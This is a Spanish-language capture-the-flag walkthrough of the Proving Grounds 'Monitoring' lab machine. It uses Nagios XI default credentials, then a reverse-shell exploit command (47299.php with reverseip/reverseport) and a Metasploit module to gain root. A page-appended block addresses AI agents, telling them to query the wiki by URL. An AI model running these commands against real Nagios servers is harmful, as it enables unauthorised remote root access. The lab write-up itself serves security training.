# Monitoring

<figure><img src="/files/fbowxBXiPYjgjoihUbMh" alt=""><figcaption></figcaption></figure>

### Enumeración

#### NMAP

Comenzamos como siempre enumerando de forma rápida los servicios que tiene abiertos el objetivo.

```
nmap -p- -vvv --open --min-rate 2000 -Pn -n 192.168.76.136
```

<figure><img src="/files/G48I25IeQc9Vh8VvWBJ2" alt=""><figcaption></figcaption></figure>

Están abiertos los puertos 22, 25, 80, 389, 443 y 5667. El siguiente paso será el escaneo profundo de estos servicios abiertos.&#x20;

```
 -nmap -p22,25,80,389,443,5667 -Pn -n -sVC 192.168.76.136
```

<figure><img src="/files/HjaIH35jViwBK7T9iyuU" alt=""><figcaption></figcaption></figure>

Existen 6 puertos abiertos en el equipo target.&#x20;

* Puerto 22 -> SSH -> OpenSSH 7.2
* Puerto 25 ->  SMTP -> Postfix
* Puerto 80 -> HTTP -> Apache httpd 2.4.18
* Puerto 389 -> LDAP -> OpenLDAP 2.2.X - 2.3.X
* Puerto 443 -> HTTPS -> Apache httpd 2.4.18
* Puerto 5667 -> ?

Además de una versión que puede ser interesante más adelante, Nagios XI.

#### Enumeración Web

Tenemos abiertos los puertos 80 y 443, así que comenzamos viendo el contenido.

<figure><img src="/files/E0Nlg8gIr3qkiJelZi6e" alt=""><figcaption><p>Puerto 80</p></figcaption></figure>

Se está ejecutando un servicio Nagios XI en el puerto 80. Revisando el código fuente no encontramos nada interesante. Pulsamos en "Acess Nagios XI" y se nos redirige a un inicio de sesión.&#x20;

<figure><img src="/files/r6wSWED02mQlibURn8EE" alt=""><figcaption></figcaption></figure>

Probaremos algunas credenciales por defecto comunes admin:admin, admin:password... pero no obtenemos acceso. Vamos a buscar en Google las credenciales de inicio de sesión por defecto para Nagios y encontramos que el username por defecto es "nagiosadmin" y vamos a probar "admin" como contraseña. Tenemos credenciales para iniciar sesión en Nagios XI, **"nagiosadmin:admin"**.

<figure><img src="/files/51iFFluV51GXubzdneMW" alt=""><figcaption></figcaption></figure>

Vamos a enumerar los directorios disponibles, para lo cual utilizaremos dirsearch.&#x20;

```
dirsearch -u "http://192.168.76.136" -i200,301 
```

<figure><img src="/files/JW9HoZjbXe9jppyJQlKo" alt=""><figcaption></figcaption></figure>

No hay anda interesante.&#x20;

Vamos a buscar vulnerabilidades para Nagios XI. Utilizaremos searchsploit.&#x20;

Sabemos que la versión de Nagios es la 5.6.0

<figure><img src="/files/WhvrPvGEtE6hvwOwGTsv" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/wrDjKTxwC6aKdnOz8bVZ" alt=""><figcaption></figcaption></figure>

### Explotación

#### Explotación manual

Descargamos el exploit para ver si se adapta a nuestras necesidades.

```
searchsploit -m 47299.php
```

Vemos como debemos ejecutarlo.

<figure><img src="/files/6MF6GJBYTshw1eIUzkZG" alt=""><figcaption></figcaption></figure>

Nota: Debemos instalar "php dom"

```
sudo apt-get install php-dom
```

Una vez instalado "php dom" ejecutamos el exploit como se indicaba anteriormente y por otro lado, colocaremos un oyente nc en el puerto 4444.

```
php 47299.php --host=192.168.76.136 --ssl=false --user=nagiosadmin --pass=admin --reverseip=192.168.49.76 --reverseport=4444
```

<figure><img src="/files/GqOpAcHN7eMRDIq3k0St" alt=""><figcaption><p>Shell</p></figcaption></figure>

<figure><img src="/files/D6Ng5japNFszGAZ0ZzdN" alt=""><figcaption></figcaption></figure>

Ya tenemos conexión con la máquina objetivo, además de privilegios máximos. Vamos a buscar en este caso la única flag existente, proof.txt.

<figure><img src="/files/H9DfsRhrKJipMwX52Oxy" alt=""><figcaption><p>Flag proof.txt</p></figcaption></figure>

Ya tendríamos la máquina acabada.

#### Explotación vía Metasploit

Una vez hemos realizado la exploit vía "manual", vamos a realizar la vulneración utilizando Metasploit. Vamos a ello.&#x20;

```
use exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce
```

Configuramos el exploit.&#x20;

<figure><img src="/files/TXvOTVKMlDgV5zRtQgkD" alt=""><figcaption></figcaption></figure>

Y ejecutamos.

<figure><img src="/files/4pKZmwTRtJSGUvXpOXcW" alt=""><figcaption></figcaption></figure>

Y ya volveriamos a tener conexión con la máquina objetivo. Solo quedaría volver a buscar la flag proof.txt.

<figure><img src="/files/r70rSbswvOoB8ZiDhRdl" alt=""><figcaption></figcaption></figure>

Y tendríamos acabada la máquina, esta vez de manera automatiza utilizando un exploit de la herramienta Metasploit.&#x20;

{% embed url="<https://www.youtube.com/watch?v=YAP0VgnvEvo>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://wiki.securiters.com/securiters-wiki/write-ups/proving-grounds/monitoring.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.